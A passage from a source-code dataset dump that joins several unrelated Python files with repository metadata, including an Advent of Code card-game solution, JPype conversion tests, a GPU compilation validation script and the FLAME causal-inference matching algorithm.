v2 = p2.pop(0)
if len(p1) >= v1 and len(p2) >= v2:
if debug: print("Recursive Combat")
new_p1 = p1.copy()[:v1]
new_p2 = p2.copy()[:v2]
winner, _ = play_advanced(new_p1, new_p2, debug)
else:
if v1 > v2:
if debug: print("Player 1 wins this round!")
winner = 1
else:
if debug: print("Player 2 wins this round!")
winner = 2
if winner == 1:
p1.append(v1)
p1.append(v2)
else:
p2.append(v2)
p2.append(v1)
if len(p1) == 0:
return 2, p2
else:
return 1, p1
@Timer()
def run_part_1(in_file: str, debug: bool = False) -> int:
pretty.printHeader(DAY, 1, inspect.stack()[0].function, in_file)
result = 0
p1, p2 = parse(loadingUtils.importToArray(in_file))
print(p1)
print(p2)
winner = play(p1,p2, debug)
print(winner)
winner.reverse()
for i, v in enumerate(winner):
result += (i+1) * v
print("Result = {}".format(result))
return result
@Timer()
def run_part_2(in_file: str, debug: bool = False) -> int:
pretty.printHeader(DAY, 2, inspect.stack()[0].function, in_file)
result = 0
p1, p2 = parse(loadingUtils.importToArray(in_file))
_, winner = play_advanced(p1,p2, debug)
print(winner)
winner.reverse()
for i, v in enumerate(winner):
result += (i+1) * v
print("Result = {}".format(result))
return result
if __name__ == "__main__":
run_part_1(get_path() + "/test1", True)
run_part_1(get_path() + "/input1")
run_part_2(get_path() + "/test2", True)
run_part_2(get_path() + "/test1", True)
run_part_2(get_path() + "/input1")
| true | true |
1c3c99d4efde7cd5f8c65c16cfd8ad83ccc59284 | 486 | py | Python | cpab/cpaNd/model/_ScaleDependentLogPrior.py | freifeld/cpabDiffeo | 22df6cdbd7111b9ae3e7f1c0e31ff85e92d281a6 | [
"MIT"
] | 17 | 2016-03-16T21:35:36.000Z | 2021-11-11T04:16:21.000Z | cpab/cpaNd/model/_ScaleDependentLogPrior.py | freifeld/cpabDiffeo | 22df6cdbd7111b9ae3e7f1c0e31ff85e92d281a6 | [
"MIT"
] | null | null | null | cpab/cpaNd/model/_ScaleDependentLogPrior.py | freifeld/cpabDiffeo | 22df6cdbd7111b9ae3e7f1c0e31ff85e92d281a6 | [
"MIT"
] | 4 | 2016-08-12T23:02:09.000Z | 2019-03-14T18:20:36.000Z | #!/usr/bin/env python
"""
Created on Wed May 7 11:30:31 2014
Author: Oren Freifeld
Email: freifeld@csail.mit.edu
"""
from _ScaleDependentLogPriorGeneral import ScaleDependentLogPriorGeneral
#from of.utils import ipshell
#eps = 1e-16
class ScaleDependentLogPrior(ScaleDependentLogPriorGeneral):
    def calc_lp(self, theta):
        """Log prior of theta: the Gaussian quadratic form
        -0.5 * (theta - mu)^T J (theta - mu), where J is the inverse
        CPA covariance (normalization constant omitted)."""
        diff = theta - self.mu
        return -0.5 * diff.dot(self.cpa_cov_inv).dot(diff)
from _ScaleDependentLogPriorGeneral import ScaleDependentLogPriorGeneral
class ScaleDependentLogPrior(ScaleDependentLogPriorGeneral):
def calc_lp(self,theta):
J = self.cpa_cov_inv
mu = self.mu
return -0.5 * (theta-mu).dot(J).dot(theta-mu) | true | true |
1c3c9a1afd3f1280ce4b40416f23daa9e9bc7e3e | 382 | py | Python | packages/PIPS/validation/Gpu/scalar_passed_by_reference01.py | DVSR1966/par4all | 86b33ca9da736e832b568c5637a2381f360f1996 | [
"MIT"
] | 51 | 2015-01-31T01:51:39.000Z | 2022-02-18T02:01:50.000Z | packages/PIPS/validation/Gpu/scalar_passed_by_reference01.py | DVSR1966/par4all | 86b33ca9da736e832b568c5637a2381f360f1996 | [
"MIT"
] | 7 | 2017-05-29T09:29:00.000Z | 2019-03-11T16:01:39.000Z | packages/PIPS/validation/Gpu/scalar_passed_by_reference01.py | DVSR1966/par4all | 86b33ca9da736e832b568c5637a2381f360f1996 | [
"MIT"
] | 12 | 2015-03-26T08:05:38.000Z | 2022-02-18T02:01:51.000Z | from validation import vworkspace
with vworkspace() as w:
    # Disable memory-effects-only mode so full effect analysis runs.
    w.props.memory_effects_only = False
    # Scalarize and privatize 'main', then run two passes of
    # (internalize parallel code + coarse-grain parallelization)
    # before mapping the parallel loops onto the GPU with gpu_ify.
    w.fun.main.scalarization()
    w.fun.main.privatize_module()
    w.fun.main.internalize_parallel_code()
    w.fun.main.coarse_grain_parallelization()
    w.fun.main.internalize_parallel_code()
    w.fun.main.coarse_grain_parallelization()
    w.fun.main.gpu_ify()
    w.all_functions.display()
| 25.466667 | 43 | 0.774869 | from validation import vworkspace
with vworkspace() as w:
w.props.memory_effects_only = False
w.fun.main.scalarization()
w.fun.main.privatize_module()
w.fun.main.internalize_parallel_code()
w.fun.main.coarse_grain_parallelization()
w.fun.main.internalize_parallel_code()
w.fun.main.coarse_grain_parallelization()
w.fun.main.gpu_ify()
w.all_functions.display()
| true | true |
1c3c9b72ba406771030272645ee21c69e5951ecd | 2,899 | py | Python | test/jpypetest/test_classhints.py | pitmanst/jpype | 7256261e435b5c9309941c668258bebd1bcdff2d | [
"Apache-2.0"
] | 531 | 2018-07-19T03:30:04.000Z | 2022-03-29T16:52:44.000Z | test/jpypetest/test_classhints.py | pitmanst/jpype | 7256261e435b5c9309941c668258bebd1bcdff2d | [
"Apache-2.0"
] | 715 | 2018-07-18T09:21:01.000Z | 2022-03-24T17:45:49.000Z | test/jpypetest/test_classhints.py | pitmanst/jpype | 7256261e435b5c9309941c668258bebd1bcdff2d | [
"Apache-2.0"
] | 80 | 2018-07-18T13:10:55.000Z | 2022-03-31T19:47:16.000Z | # *****************************************************************************
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# See NOTICE file for details.
#
# *****************************************************************************
import jpype
import common
class MyImpl(object):
    """Plain Python object exposing a 'blah' attribute; used below to
    exercise attribute-based implicit conversion (@JConversion)."""
    def blah(self):
        pass
class ClassHintsTestCase(common.JPypeTestCase):
    """Tests for jpype's Python->Java implicit conversions: built-in
    conversions (CharSequence, Instant, Path, File) and user-registered
    @JConversion hooks (exact-type and attribute-based)."""
    def setUp(self):
        """Look up the Java fixtures and define a @JImplements proxy class."""
        common.JPypeTestCase.setUp(self)
        self.Custom = jpype.JClass("jpype.classhints.Custom")
        self.ClassHintsTest = jpype.JClass("jpype.classhints.ClassHintsTest")
        @jpype.JImplements("jpype.classhints.Custom")
        class MyCustom(object):
            def __init__(self, arg):
                self.arg = arg
        self.MyCustom = MyCustom
    def testCharSequence(self):
        """A Python str converts to java.lang.CharSequence for parse()."""
        Instant = jpype.JClass("java.time.Instant")
        s = "2019-12-21T05:26:13.223189Z"
        # Bug fix: assertTrue(x, s) treated s as the failure *message*,
        # so the round-trip was never actually compared.
        self.assertEqual(str(Instant.parse(s)), s)
    def testInstant(self):
        """datetime converts to java.time.Instant via JObject."""
        import datetime
        now = datetime.datetime.utcnow()
        Instant = jpype.JClass("java.time.Instant")
        self.assertIsInstance(jpype.JObject(now, Instant), Instant)
    def testPath(self):
        """pathlib.Path converts to java.nio.file.Path via JObject."""
        import pathlib
        JPath = jpype.JClass("java.nio.file.Path")
        self.assertIsInstance(jpype.JObject(
            pathlib.Path(__file__).absolute(), JPath), JPath)
    def testFile(self):
        """pathlib.Path converts to java.io.File via JObject."""
        import pathlib
        JFile = jpype.JClass("java.io.File")
        self.assertIsInstance(jpype.JObject(
            pathlib.Path(__file__).absolute(), JFile), JFile)
    def testConvertExact(self):
        """@JConversion(..., exact=str) enables str -> Custom conversion."""
        cht = self.ClassHintsTest
        with self.assertRaises(TypeError):
            cht.call("hello")
        @jpype.JConversion(self.Custom, exact=str)
        def StrToCustom(jcls, args):
            return self.MyCustom(args)
        cht.call("hello")
        self.assertIsInstance(cht.input, self.MyCustom)
        self.assertEqual(cht.input.arg, "hello")
    def testConvertAttribute(self):
        """@JConversion(..., attribute="blah") converts objects with 'blah'."""
        cht = self.ClassHintsTest
        with self.assertRaises(TypeError):
            cht.call(MyImpl())
        @jpype.JConversion(self.Custom, attribute="blah")
        def StrToCustom(jcls, args):
            return self.MyCustom(args)
        cht.call(MyImpl())
        self.assertIsInstance(cht.input, self.MyCustom)
        self.assertIsInstance(cht.input.arg, MyImpl)
| 32.943182 | 79 | 0.617109 |
import jpype
import common
class MyImpl(object):
def blah(self):
pass
class ClassHintsTestCase(common.JPypeTestCase):
def setUp(self):
common.JPypeTestCase.setUp(self)
self.Custom = jpype.JClass("jpype.classhints.Custom")
self.ClassHintsTest = jpype.JClass("jpype.classhints.ClassHintsTest")
@jpype.JImplements("jpype.classhints.Custom")
class MyCustom(object):
def __init__(self, arg):
self.arg = arg
self.MyCustom = MyCustom
def testCharSequence(self):
Instant = jpype.JClass("java.time.Instant")
s = "2019-12-21T05:26:13.223189Z"
self.assertTrue(str(Instant.parse(s)), s)
def testInstant(self):
import datetime
now = datetime.datetime.utcnow()
Instant = jpype.JClass("java.time.Instant")
self.assertIsInstance(jpype.JObject(now, Instant), Instant)
def testPath(self):
import pathlib
JPath = jpype.JClass("java.nio.file.Path")
self.assertIsInstance(jpype.JObject(
pathlib.Path(__file__).absolute(), JPath), JPath)
def testFile(self):
import pathlib
JFile = jpype.JClass("java.io.File")
self.assertIsInstance(jpype.JObject(
pathlib.Path(__file__).absolute(), JFile), JFile)
def testConvertExact(self):
cht = self.ClassHintsTest
with self.assertRaises(TypeError):
cht.call("hello")
@jpype.JConversion(self.Custom, exact=str)
def StrToCustom(jcls, args):
return self.MyCustom(args)
cht.call("hello")
self.assertIsInstance(cht.input, self.MyCustom)
self.assertEqual(cht.input.arg, "hello")
def testConvertAttribute(self):
cht = self.ClassHintsTest
with self.assertRaises(TypeError):
cht.call(MyImpl())
@jpype.JConversion(self.Custom, attribute="blah")
def StrToCustom(jcls, args):
return self.MyCustom(args)
cht.call(MyImpl())
self.assertIsInstance(cht.input, self.MyCustom)
self.assertIsInstance(cht.input.arg, MyImpl)
| true | true |
1c3c9b8fe0389b22672e4547b2a753df434c33c8 | 12,791 | py | Python | dame_flame/flame_algorithm.py | thowell332/DAME-FLAME-Python-Package | 860e7b0443903c0b79f3b214c359fdddb9718caf | [
"MIT"
] | null | null | null | dame_flame/flame_algorithm.py | thowell332/DAME-FLAME-Python-Package | 860e7b0443903c0b79f3b214c359fdddb9718caf | [
"MIT"
] | null | null | null | dame_flame/flame_algorithm.py | thowell332/DAME-FLAME-Python-Package | 860e7b0443903c0b79f3b214c359fdddb9718caf | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""The main file for the FLAME algorithm"""
# author: Neha Gupta, Duke University
# Copyright Duke University 2020
# License: MIT
import pandas as pd
import numpy as np
from . import grouped_mr
from . import dame_algorithm
from . import flame_dame_helpers
def decide_drop(all_covs, consider_dropping, prev_drop, df_all,
                treatment_column_name, outcome_column_name, df_holdout_array,
                adaptive_weights, alpha_given, df_unmatched, return_matches,
                C, weight_array):
    """
    Decide which covariate to drop next and perform the resulting match.

    Args:
        all_covs (array): Array of covar column names, not including treatment
            and outcome columns.
        consider_dropping (set): Covariate column names that have not yet
            been dropped in a previous iteration
        prev_drop (set): Covariate column names that have been dropped
            in a previous iteration

    Returns:
        (best_drop, pe, matched_rows, return_matches, bf, units_in_g).
        If the predictive-error computation fails, a 6-tuple of False
        values is returned so the caller's 6-way unpacking still works.
    """
    # This is where we decide who to drop, and also compute the pe
    # value that gets outputted in the list described in readme.
    best_drop = 0
    best_mq = float("-inf")
    best_return_matches = 0
    best_matched_rows = 0
    best_bf = 0
    best_pe = 0
    best_units_in_g = 0

    if not adaptive_weights:
        # Fixed weights: drop the covariate with the minimum value in
        # the weight array.
        min_covar_weight = 1
        best_drop = 0
        for poss_drop in consider_dropping:
            index_in_all_covs = all_covs.index(poss_drop)
            covar_weight = weight_array[index_in_all_covs]
            if covar_weight < min_covar_weight:
                min_covar_weight = covar_weight
                best_drop = poss_drop

        all_covs = set(all_covs)
        covs_match_on = list(all_covs.difference([best_drop]).difference(prev_drop))

        # need to make sure we don't edit the mutable dataframes, then do match
        df_all_temp = df_all.copy(deep=True)
        return_matches_temp = return_matches.copy(deep=True)
        matched_rows, return_matches, units_in_g = grouped_mr.algo2_GroupedMR(
            df_all_temp, df_unmatched, covs_match_on, all_covs,
            treatment_column_name, outcome_column_name, return_matches_temp)

        # find the BF for this covariate set's match.
        BF = flame_dame_helpers.compute_bf(matched_rows,
                                           treatment_column_name, df_unmatched)
        # No PE is computed when adaptive_weights is False, so report 0.
        return best_drop, 0, matched_rows, return_matches, BF, units_in_g
    else:
        # Adaptive weights: try dropping each candidate covariate and keep
        # the one maximizing the match quality MQ = C * BF - PE.
        all_covs = set(all_covs)  # hoisted out of the loop (invariant)
        for poss_drop in consider_dropping:
            # S is the set of covars we drop. We try dropping each one
            s = prev_drop.union([poss_drop])
            PE = flame_dame_helpers.find_pe_for_covar_set(
                df_holdout_array, treatment_column_name, outcome_column_name, s,
                adaptive_weights, alpha_given)
            # error check. PE can be float(0), but not denote error
            if PE is False:
                # Bug fix: this error path used to return only 5 values,
                # which itself crashed the caller's 6-way unpacking.
                return False, False, False, False, False, False

            covs_match_on = list(all_covs.difference([poss_drop]).difference(prev_drop))

            # need to make sure we don't edit the mutable dataframes, then do match
            df_all_temp = df_all.copy(deep=True)
            return_matches_temp = return_matches.copy(deep=True)
            matched_rows, return_matches_temp, units_in_g = grouped_mr.algo2_GroupedMR(
                df_all_temp, df_unmatched, covs_match_on, all_covs,
                treatment_column_name, outcome_column_name, return_matches_temp)

            # find the BF for this covariate set's match.
            BF = flame_dame_helpers.compute_bf(
                matched_rows, treatment_column_name, df_unmatched)

            # Use the largest MQ as the covariate set to drop.
            MQ = C * BF - PE
            if MQ > best_mq:
                best_mq = MQ
                best_pe = PE
                best_bf = BF
                best_drop = poss_drop
                best_return_matches = return_matches_temp
                best_matched_rows = matched_rows
                best_units_in_g = units_in_g
        return best_drop, best_pe, best_matched_rows, best_return_matches, best_bf, best_units_in_g
def flame_generic(df_all, treatment_column_name, weight_array,
                  outcome_column_name, adaptive_weights, alpha, df_holdout,
                  repeats, want_pe, verbose, want_bf, missing_holdout_replace,
                  early_stops, pre_dame, C):
    '''
    Run the FLAME matching loop: first match on all covariates, then
    iteratively drop the covariate chosen by decide_drop until a stopping
    criterion fires (or hand off to DAME after pre_dame iterations).

    All variables are the same as dame algorithm 1 except for:
    pre_dame(False, integer): Indicates whether the algorithm will move to
        DAME and after integer number of iterations.

    Returns a list: [matched-units DataFrame joined with per-unit weights,
    MG_units, optionally return_pe, optionally return_bf, and — when DAME
    is invoked — DAME's own return value appended last].
    '''
    # Initialize variables. These are all moving/temporary throughout algo
    all_covs = df_all.columns.tolist()
    all_covs.remove(treatment_column_name)
    all_covs.remove(outcome_column_name)
    df_unmatched = df_all.copy(deep=True)
    # The items getting returned
    return_pe= [] # list of predictive errors,
    return_bf = []
    MG_units = [] # list of unit ids for each matched group
    # weights indicates the number of times each unit appears in a group
    weights = pd.DataFrame(np.zeros(shape=(len(df_all.index),1)),
                           columns = ['weights'],
                           index = df_all.index)
    return_matches = pd.DataFrame(columns=all_covs, index=df_all.index)
    # Initialize variables used in checking stopping criteria
    orig_len_df_all = len(df_all) # Need this bc of case where repeats=False
    orig_tot_treated = df_all[treatment_column_name].sum()
    # As an initial step, we attempt to match on all covariates
    covs_match_on = all_covs
    matched_rows, return_matches, units_in_g = grouped_mr.algo2_GroupedMR(
        df_all, df_unmatched, covs_match_on, all_covs, treatment_column_name,
        outcome_column_name, return_matches)
    if (len(units_in_g)) != 0:
        # add the newly matched groups to MG_units, which tracks units in groups
        MG_units = MG_units + units_in_g
        # update unit weights for all units which appear in the new groups
        # flatten to 1 list, then add occurrences of unique units
        flat_units_in_g = np.concatenate(units_in_g).ravel()
        unique_units, occurrences = np.unique(flat_units_in_g, return_counts=True)
        for index in range(len(unique_units)):
            weights['weights'][unique_units[index]] += occurrences[index]
    # Now remove the matched units
    df_unmatched.drop(matched_rows.index, inplace=True)
    if repeats == False:
        df_all = df_unmatched
    # set up all the extra dfs if needed
    if missing_holdout_replace != False:
        # now df_holdout is actually an array of imputed datasets
        df_holdout_array = flame_dame_helpers.create_mice_dfs(
            df_holdout, missing_holdout_replace, outcome_column_name)
    else:
        # df_holdout_array exists regardless, just size 1 and equal to itself
        # if not doing mice.
        df_holdout_array = list()
        df_holdout_array.append(df_holdout)
    h = 1 # The iteration number
    if verbose == 3:
        flame_dame_helpers.verbose_output(h, len(MG_units),
            df_unmatched[treatment_column_name].sum(), len(df_unmatched),
            orig_len_df_all, orig_tot_treated, 0, orig_len_df_all, set())
    prev_iter_num_unmatched = len(df_unmatched) # this is for output progress
    consider_dropping = set(i for i in all_covs)
    prev_dropped = set()
    # Here, we begin the iterative dropping procedure of FLAME
    while True:
        # see if any stopping criteria have been met
        if (flame_dame_helpers.stop_iterating(early_stops, df_unmatched,
                                              repeats, treatment_column_name,
                                              orig_len_df_all, h,
                                              orig_tot_treated,
                                              consider_dropping)):
            break
        # pick the covariate whose removal maximizes match quality, and
        # perform the corresponding match in the same step
        new_drop, pe, matched_rows, return_matches, bf, units_in_g = decide_drop(all_covs,
            consider_dropping, prev_dropped, df_all, treatment_column_name,
            outcome_column_name, df_holdout_array, adaptive_weights, alpha,
            df_unmatched, return_matches, C, weight_array)
        # Check for error in above step:
        if (new_drop == False):
            raise Exception("There may have been an error in your choice of "\
                            "machine learning algorithm used to choose the "\
                            "covariate to drop. For help, please reach on "\
                            "github to the team. ")
            break
        if (len(units_in_g)) != 0:
            # add the newly matched groups to MG_units, which tracks units in groups
            MG_units = MG_units + units_in_g
            # update unit weights for all units which appear in the new groups
            # flatten to 1 list, then add occurrences of unique units
            flat_units_in_g = np.concatenate(units_in_g).ravel()
            unique_units, occurrences = np.unique(flat_units_in_g, return_counts=True)
            for index in range(len(unique_units)):
                weights['weights'][unique_units[index]] += occurrences[index]
        return_pe.append(pe)
        if (want_bf == True):
            # if we need to track the bf, do so.
            return_bf.append(bf)
        if (early_stops.pe != False):
            if pe >= early_stops.pe:
                print((orig_len_df_all - len(df_unmatched)), "units matched. "\
                      "We stopped matching with a pe of ", pe)
                break
        # Update covariate groups for future iterations
        consider_dropping = consider_dropping.difference([new_drop])
        prev_dropped.add(new_drop)
        # Remove matches.
        df_unmatched = df_unmatched.drop(matched_rows.index, errors='ignore')
        if repeats == False:
            df_all = df_unmatched
        h += 1
        # End of iter. Prints output based on verbose.
        if verbose == 1:
            print("Iteration number: ", h)
        if ((verbose == 2 and (h%10==0)) or verbose == 3):
            flame_dame_helpers.verbose_output(h, len(MG_units),
                df_unmatched[treatment_column_name].sum(), len(df_unmatched),
                orig_len_df_all, orig_tot_treated, pe, prev_iter_num_unmatched,
                new_drop)
            if want_bf == True:
                print("\tBalancing Factor of this iteration: ", bf)
        # Do we switch to DAME?
        if (pre_dame != False and pre_dame <= h):
            # drop the columns that have already been matched on
            for i in prev_dropped:
                df_all = df_all.loc[:, df_all.columns.drop(i)]
                df_holdout = df_holdout.loc[:, df_holdout.columns.drop(i)]
            # call dame algorithm
            print((orig_len_df_all - len(df_unmatched)), "units matched. "\
                  "Moving to DAME algorithm")
            return_matches_dame = dame_algorithm.algo1(
                df_all, treatment_column_name, weight_array,
                outcome_column_name, adaptive_weights, alpha, df_holdout,
                repeats, want_pe, verbose, want_bf, missing_holdout_replace,
                early_stops)
            # when dame is done, we
            # return the matches we made here, plus the matches made in dame.
            # but first, make sure anything not matched isn't in the df:
            return_matches = return_matches.dropna(axis=0) #drop rows with nan
            return_matches = return_matches.join(weights)
            return_package = [return_matches, MG_units]
            if (want_pe == True):
                return_package.append(return_pe)
            if (want_bf == True):
                return_package.append(return_bf)
            return_package.append(return_matches_dame)
            return return_package
    # end loop.
    return_matches = return_matches.dropna(axis=0) #drop rows with nan
    return_package = [return_matches]
    # append weights and MGs to return package
    return_package[0] = return_package[0].join(weights)
    return_package.append(MG_units)
    if (want_pe == True):
        return_package.append(return_pe)
    if (want_bf == True):
        return_package.append(return_bf)
    return return_package
| 40.865815 | 99 | 0.633258 |
import pandas as pd
import numpy as np
from . import grouped_mr
from . import dame_algorithm
from . import flame_dame_helpers
def decide_drop(all_covs, consider_dropping, prev_drop, df_all,
treatment_column_name, outcome_column_name, df_holdout_array,
adaptive_weights, alpha_given, df_unmatched, return_matches,
C, weight_array):
best_drop = 0
best_mq = float("-inf")
best_return_matches = 0
best_matched_rows = 0
best_bf = 0
best_pe = 0
best_units_in_g = 0
if adaptive_weights == False:
min_covar_weight = 1
best_drop = 0
for poss_drop in consider_dropping:
index_in_all_covs = all_covs.index(poss_drop)
covar_weight = weight_array[index_in_all_covs]
if covar_weight < min_covar_weight:
min_covar_weight = covar_weight
best_drop = poss_drop
all_covs = set(all_covs)
covs_match_on = all_covs.difference([best_drop]).difference(prev_drop)
covs_match_on = list(covs_match_on)
df_all_temp = df_all.copy(deep=True)
return_matches_temp = return_matches.copy(deep=True)
matched_rows, return_matches, units_in_g = grouped_mr.algo2_GroupedMR(
df_all_temp, df_unmatched, covs_match_on, all_covs,
treatment_column_name, outcome_column_name, return_matches_temp)
# find the BF for this covariate set's match.
BF = flame_dame_helpers.compute_bf(matched_rows,
treatment_column_name, df_unmatched)
return best_drop, 0, matched_rows, return_matches, BF, units_in_g
else:
for poss_drop in consider_dropping:
s = prev_drop.union([poss_drop])
PE = flame_dame_helpers.find_pe_for_covar_set(
df_holdout_array, treatment_column_name, outcome_column_name, s,
adaptive_weights, alpha_given)
if PE == False and type(PE) == bool:
return False, False, False, False, False
all_covs = set(all_covs)
covs_match_on = all_covs.difference([poss_drop]).difference(prev_drop)
covs_match_on = list(covs_match_on)
df_all_temp = df_all.copy(deep=True)
return_matches_temp = return_matches.copy(deep=True)
matched_rows, return_matches_temp, units_in_g = grouped_mr.algo2_GroupedMR(
df_all_temp, df_unmatched, covs_match_on, all_covs,
treatment_column_name, outcome_column_name, return_matches_temp)
# find the BF for this covariate set's match.
BF = flame_dame_helpers.compute_bf(
matched_rows, treatment_column_name, df_unmatched)
MQ = C * BF - PE
if MQ > best_mq:
best_mq = MQ
best_pe = PE
best_bf = BF
best_drop = poss_drop
best_return_matches = return_matches_temp
best_matched_rows = matched_rows
best_units_in_g = units_in_g
return best_drop, best_pe, best_matched_rows, best_return_matches, best_bf, best_units_in_g
def flame_generic(df_all, treatment_column_name, weight_array,
outcome_column_name, adaptive_weights, alpha, df_holdout,
repeats, want_pe, verbose, want_bf, missing_holdout_replace,
early_stops, pre_dame, C):
all_covs = df_all.columns.tolist()
all_covs.remove(treatment_column_name)
all_covs.remove(outcome_column_name)
df_unmatched = df_all.copy(deep=True)
return_pe= []
return_bf = []
MG_units = []
weights = pd.DataFrame(np.zeros(shape=(len(df_all.index),1)),
columns = ['weights'],
index = df_all.index)
return_matches = pd.DataFrame(columns=all_covs, index=df_all.index)
orig_len_df_all = len(df_all)
orig_tot_treated = df_all[treatment_column_name].sum()
covs_match_on = all_covs
matched_rows, return_matches, units_in_g = grouped_mr.algo2_GroupedMR(
df_all, df_unmatched, covs_match_on, all_covs, treatment_column_name,
outcome_column_name, return_matches)
if (len(units_in_g)) != 0:
MG_units = MG_units + units_in_g
flat_units_in_g = np.concatenate(units_in_g).ravel()
unique_units, occurrences = np.unique(flat_units_in_g, return_counts=True)
for index in range(len(unique_units)):
weights['weights'][unique_units[index]] += occurrences[index]
df_unmatched.drop(matched_rows.index, inplace=True)
if repeats == False:
df_all = df_unmatched
if missing_holdout_replace != False:
df_holdout_array = flame_dame_helpers.create_mice_dfs(
df_holdout, missing_holdout_replace, outcome_column_name)
else:
df_holdout_array = list()
df_holdout_array.append(df_holdout)
h = 1
if verbose == 3:
flame_dame_helpers.verbose_output(h, len(MG_units),
df_unmatched[treatment_column_name].sum(), len(df_unmatched),
orig_len_df_all, orig_tot_treated, 0, orig_len_df_all, set())
prev_iter_num_unmatched = len(df_unmatched)
consider_dropping = set(i for i in all_covs)
prev_dropped = set()
while True:
if (flame_dame_helpers.stop_iterating(early_stops, df_unmatched,
repeats, treatment_column_name,
orig_len_df_all, h,
orig_tot_treated,
consider_dropping)):
break
new_drop, pe, matched_rows, return_matches, bf, units_in_g = decide_drop(all_covs,
consider_dropping, prev_dropped, df_all, treatment_column_name,
outcome_column_name, df_holdout_array, adaptive_weights, alpha,
df_unmatched, return_matches, C, weight_array)
if (new_drop == False):
raise Exception("There may have been an error in your choice of "\
"machine learning algorithm used to choose the "\
"covariate to drop. For help, please reach on "\
"github to the team. ")
break
if (len(units_in_g)) != 0:
MG_units = MG_units + units_in_g
flat_units_in_g = np.concatenate(units_in_g).ravel()
unique_units, occurrences = np.unique(flat_units_in_g, return_counts=True)
for index in range(len(unique_units)):
weights['weights'][unique_units[index]] += occurrences[index]
return_pe.append(pe)
if (want_bf == True):
return_bf.append(bf)
if (early_stops.pe != False):
if pe >= early_stops.pe:
print((orig_len_df_all - len(df_unmatched)), "units matched. "\
"We stopped matching with a pe of ", pe)
break
consider_dropping = consider_dropping.difference([new_drop])
prev_dropped.add(new_drop)
df_unmatched = df_unmatched.drop(matched_rows.index, errors='ignore')
if repeats == False:
df_all = df_unmatched
h += 1
if verbose == 1:
print("Iteration number: ", h)
if ((verbose == 2 and (h%10==0)) or verbose == 3):
flame_dame_helpers.verbose_output(h, len(MG_units),
df_unmatched[treatment_column_name].sum(), len(df_unmatched),
orig_len_df_all, orig_tot_treated, pe, prev_iter_num_unmatched,
new_drop)
if want_bf == True:
print("\tBalancing Factor of this iteration: ", bf)
if (pre_dame != False and pre_dame <= h):
for i in prev_dropped:
df_all = df_all.loc[:, df_all.columns.drop(i)]
df_holdout = df_holdout.loc[:, df_holdout.columns.drop(i)]
print((orig_len_df_all - len(df_unmatched)), "units matched. "\
"Moving to DAME algorithm")
return_matches_dame = dame_algorithm.algo1(
df_all, treatment_column_name, weight_array,
outcome_column_name, adaptive_weights, alpha, df_holdout,
repeats, want_pe, verbose, want_bf, missing_holdout_replace,
early_stops)
return_matches = return_matches.dropna(axis=0) #drop rows with nan
return_matches = return_matches.join(weights)
return_package = [return_matches, MG_units]
if (want_pe == True):
return_package.append(return_pe)
if (want_bf == True):
return_package.append(return_bf)
return_package.append(return_matches_dame)
return return_package
# end loop.
return_matches = return_matches.dropna(axis=0) #drop rows with nan
return_package = [return_matches]
# append weights and MGs to return package
return_package[0] = return_package[0].join(weights)
return_package.append(MG_units)
if (want_pe == True):
return_package.append(return_pe)
if (want_bf == True):
return_package.append(return_bf)
return return_package
| true | true |
1c3c9ce7ce9d4d8460fe55292648d43120afe501 | 133 | py | Python | 001146StepikPyBegin/Stepik001146PyBeginсh07p01st04С03_symbols_20200420.py | SafonovMikhail/python_000577 | 739f764e80f1ca354386f00b8e9db1df8c96531d | [
"Apache-2.0"
] | null | null | null | 001146StepikPyBegin/Stepik001146PyBeginсh07p01st04С03_symbols_20200420.py | SafonovMikhail/python_000577 | 739f764e80f1ca354386f00b8e9db1df8c96531d | [
"Apache-2.0"
] | null | null | null | 001146StepikPyBegin/Stepik001146PyBeginсh07p01st04С03_symbols_20200420.py | SafonovMikhail/python_000577 | 739f764e80f1ca354386f00b8e9db1df8c96531d | [
"Apache-2.0"
] | null | null | null | for i in range(6):
    print("AAA")
# The loop above printed "AAA" six times; next, five "BBBB"/"E" pairs.
for i in range(5):
    print("BBBB")
    print("E")
# Finally nine "TTTTT" lines followed by a single closing "G".
for i in range(9):
    print("TTTTT")
print("G")
| 14.777778 | 18 | 0.56391 | for i in range(6):
print("AAA")
for i in range(5):
print("BBBB")
print("E")
for i in range(9):
print("TTTTT")
print("G")
| true | true |
1c3c9eb7ebc2fd35b322c1552efa50e1610c3bf1 | 2,937 | py | Python | peptidereactor/iFeature/codes/NMBroto.py | spaenigs/peptidereactor | 17efcb993505934f5b9c2d63f5cc040bb244dde9 | [
"MIT"
] | 3 | 2021-02-03T12:30:37.000Z | 2021-06-07T07:03:38.000Z | peptidereactor/iFeature/codes/NMBroto.py | spaenigs/peptidereactor | 17efcb993505934f5b9c2d63f5cc040bb244dde9 | [
"MIT"
] | 1 | 2021-01-04T14:52:27.000Z | 2021-01-04T14:52:27.000Z | peptidereactor/iFeature/codes/NMBroto.py | spaenigs/peptidereactor | 17efcb993505934f5b9c2d63f5cc040bb244dde9 | [
"MIT"
] | 1 | 2021-06-09T16:16:16.000Z | 2021-06-09T16:16:16.000Z | #!/usr/bin/env python
#_*_coding:utf-8_*_
import sys, platform, os, re
import argparse
import numpy as np
pPath = os.path.split(os.path.realpath(__file__))[0]
sys.path.append(pPath)
import checkFasta
import readFasta
import saveCode
def NMBroto(fastas, props=['CIDH920105', 'BHAR880101', 'CHAM820101', 'CHAM820102',
                           'CHOC760101', 'BIGC670101', 'CHAM810101', 'DAYM780201'],
            nlag = 30, **kw):
    """Normalized Moreau-Broto autocorrelation encoding of protein sequences.

    fastas: list of (name, sequence) pairs; props: AAindex property names
    looked up in the bundled AAidx.txt table; nlag: maximum lag.
    Returns a list of rows (header row first), or 0 when a sequence is
    shorter than nlag+1, or None when a property name is unknown.
    """
    if checkFasta.minSequenceLengthWithNormalAA(fastas) < nlag + 1:
        print('Error: all the sequence length should be larger than the nlag+1: ' + str(nlag + 1) + '\n\n')
        return 0
    # Canonical ordering of the 20 standard amino acids; defines column order.
    AA = 'ARNDCQEGHILKMFPSTWYV'
    # Locate the AAindex property table; the path differs on Windows.
